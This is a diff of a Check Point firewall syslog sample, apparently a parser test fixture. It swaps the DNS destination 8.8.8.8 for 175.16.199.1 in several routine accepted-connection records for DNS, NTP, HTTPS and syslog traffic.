 <134>1 2020-03-29T18:06:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e3ab,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40404"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:06:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e3ab,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35792"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10171"; xlatesrc:"0.0.0.0"]
@@ -3631,63 +3631,63 @@
 <134>1 2020-03-29T18:11:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e4de,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44553"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:11:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e4e6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54220"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:11:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e4e8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:12:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e505,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e505,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505541"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40192"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e505,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e505,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505541"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40192"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e505,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58786"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59191"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41679"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55369"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47868"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45848"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45258"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59191"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41679"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55369"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47868"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45848"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45258"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44938"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36918"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36918"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53298"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43105"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43105"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38706"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42942"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
